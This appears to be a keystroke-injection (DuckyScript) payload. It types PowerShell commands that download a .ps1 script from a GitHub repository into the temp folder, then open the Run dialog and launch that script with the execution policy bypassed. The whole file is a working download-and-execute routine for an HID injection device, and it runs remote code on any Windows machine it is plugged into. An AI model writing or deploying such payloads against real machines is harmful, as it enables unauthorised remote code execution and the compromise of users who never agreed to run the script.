DELAY 1800
STRING $dst="$env:TEMP\329.A.Script_Saver.ps1";$raw='https://github.com/IT-Tool-by-SalgadoTech/ittool-External_Tools/raw/refs/heads/main/329.A.Script_Saver.ps1';if(-not(Test-Path -Path (Split-Path $dst))){New-Item -ItemType Directory -Path (Split-Path $dst) -Force | Out-Null};curl.exe -L $raw -o $dst
ENTER
DELAY 2000
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 1800
STRING Start-Process -FilePath "$PSHOME\powershell.exe" -ArgumentList @('-NoExit','-ExecutionPolicy','Bypass','-File',"$env:TEMP\329.A.Script_Saver.ps1")
ENTER